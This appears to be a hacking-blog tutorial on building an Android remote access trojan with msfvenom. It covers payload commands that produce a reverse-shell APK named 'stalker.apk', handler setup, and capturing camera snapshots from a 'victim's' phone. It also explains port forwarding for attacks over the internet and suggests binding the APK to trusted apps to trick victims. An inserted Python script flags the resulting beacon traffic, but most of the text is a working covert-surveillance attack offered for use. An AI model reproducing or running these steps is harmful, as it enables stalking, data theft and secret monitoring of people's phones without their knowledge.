Welcome back, my curious hackers. Today I'll be showing you how to create an Android RAT (Remote Administration Tool). There are more than 2 billion Android devices active each month, any of which can be hacked with a remote administration tool, more commonly known as a RAT. A RAT lets an attacker monitor a device's location, read SMS messages, take camera snapshots, and even record with the microphone without the user knowing.
First, we will walk through creating an Android RAT using Metasploit.
Steps To Create Android RAT Using Metasploit:
So now let's get into it.
1. Open a terminal.
2. We are going to use the Metasploit msfvenom framework to create the exploit/backdoor for this tutorial.
3. Use this command to get your local IP.
I'm using wlan0, so my local IP (the inet address) is 192.168.0.58, as you can see in the picture above.
4. Now we have to create the exploit/backdoor for the victim. Use this command to generate it:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_local_ip> LPORT=4444 R > stalker.apk
Let me explain the above command. We are using msfvenom as the payload generator, with an Android Meterpreter payload that makes a reverse connection back to the attacker's system. LHOST is the attacker's IP address, where the reverse connection from the victim will arrive. LPORT is the port that connection will be made on, 4444 here. R > writes the generated payload out to the file. This creates the infected APK. You can choose LPORT yourself or leave it at the default of 4444.
Now we are ready for the next step. Because this payload uses reverse_tcp, the attacker's system must listen on the port specified in the payload for the reverse connection from the victim.
So we need to set up a handler for incoming connections on that port. Let's do it.
5. Type msfconsole in the terminal to open Metasploit.
6. To set up the handler, enter the following commands.
set payload android/meterpreter/reverse_tcp
7. Remember the local IP and port you used while creating the APK. The following screenshots show how to set LHOST and LPORT and start the exploit.
When that infected APK is installed on any Android device on the local network, a reverse Meterpreter session will be opened, which means you now have full access to the victim's phone.
Now you can use various commands to get the data you want from the victim's phone. For example, if you want to take a picture with that phone, type webcam_list. This shows the list of cameras on the victim's device. Now type webcam_snap 2 and BOOM, you have just captured a picture from the victim's phone.
The process to create a RAT for the WAN is only a little different. The only things you have to do are port forward your local IP on your router and create the APK with your public IP. Basically, we try to establish the following connection over the WAN.
Create the infected APK:
To create an infected APK for the WAN, you just have to use your public IP instead of your local IP.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_public_ip> LPORT=4444 R > stalker.apk
You can use various sites to get your public IP. The one I use to view my local IP is wtfismyip.com. I'm sure you won't be using this site. HAHAHAHAHHA
Port forward your local IP:
- Log in to your router at its default gateway address.
- Now go to the port forwarding tab and forward your local IP on the same port you used while creating the infected APK, as shown in the image below.
That's how you have to port forward your local IP and port. The IP you use here should be your local IP. The IP (10.0.0.2) shown in the image is not my local IP, but in this tutorial I'll pretend that it is.
The rest of the process is the same. Make sure to set the local IP as LHOST in the handler in both cases, LAN and WAN, and set LPORT to the one you used while creating the infected APK.
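From the defender's side, the connection described above (the victim device repeatedly connecting out to LHOST:LPORT, 4444 by default, whether LHOST is a LAN address or a forwarded public IP) is the visible trace of this payload. The following Python script is an added example, not part of the original tutorial, that flags that pattern in a simple outbound-connection log. The log format, the repeat threshold and the list of "common" ports are assumptions; the log lines are constructed.

```python
"""Flag devices beaconing to a reverse_tcp-style handler.

Assumed log format (constructed for this example), one outbound TCP
connect per line: <time> <src_ip> <dst_ip> <dst_port>.
"""
from collections import defaultdict

# msfvenom's default LPORT in the tutorial; always worth reporting.
DEFAULT_HANDLER_PORTS = {4444}
# Assumed threshold: a reverse_tcp payload keeps reconnecting, so the same
# src -> dst:port tuple repeats. Tune to the environment.
MIN_REPEATS = 3
# Assumed set of ports a phone legitimately talks to all day.
COMMON_PORTS = {53, 80, 443, 993, 995, 5228}


def parse_line(line):
    """Split one log line into (time, src, dst, port)."""
    ts, src, dst, port = line.split()
    return ts, src, dst, int(port)


def find_beacons(lines, min_repeats=MIN_REPEATS):
    """Return {(src, dst, port): count} for repeated connects to a
    destination port that is the default handler port or is otherwise
    uncommon for a mobile device. Comment and blank lines are skipped."""
    counts = defaultdict(int)
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        _, src, dst, port = parse_line(line)
        counts[(src, dst, port)] += 1
    return {
        key: n for key, n in counts.items()
        if n >= min_repeats
        and (key[2] in DEFAULT_HANDLER_PORTS or key[2] not in COMMON_PORTS)
    }


# Constructed sample: one phone beaconing to the tutorial's LAN handler,
# normal HTTPS traffic, and a single stray connect that stays below threshold.
SAMPLE_LOG = """\
# time src dst dport
10:00:01 192.168.0.23 198.51.100.7 443
10:00:05 192.168.0.23 192.168.0.58 4444
10:00:10 192.168.0.23 192.168.0.58 4444
10:00:15 192.168.0.23 192.168.0.58 4444
10:00:20 192.168.0.23 198.51.100.7 443
10:00:21 192.168.0.23 198.51.100.7 443
10:00:30 192.168.0.41 203.0.113.9 4444
"""

if __name__ == "__main__":
    for (src, dst, port), n in find_beacons(SAMPLE_LOG.splitlines()).items():
        print(f"{src} -> {dst}:{port} repeated {n}x: possible reverse_tcp beacon")
```

The HTTPS connections repeat just as often but are excluded by the common-port list; the 4444 beacon is reported because of the port alone, whatever host it points at.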
You can also use various tools to merge this infected APK with a trusted Android application to trap the victim.
There are other tools, like AhMyth, which are a bit easier to use and have a good user interface. There is also an Android RAT named DENDROID, which was first sold on a dark market for $300 but was later leaked and is now easily available. I'll soon write a blog post on how to set up DENDROID for remote administration, and on other tools like AhMyth that are a bit easier to use.
Feel free to comment if you have any problems with the above process, and stay tuned.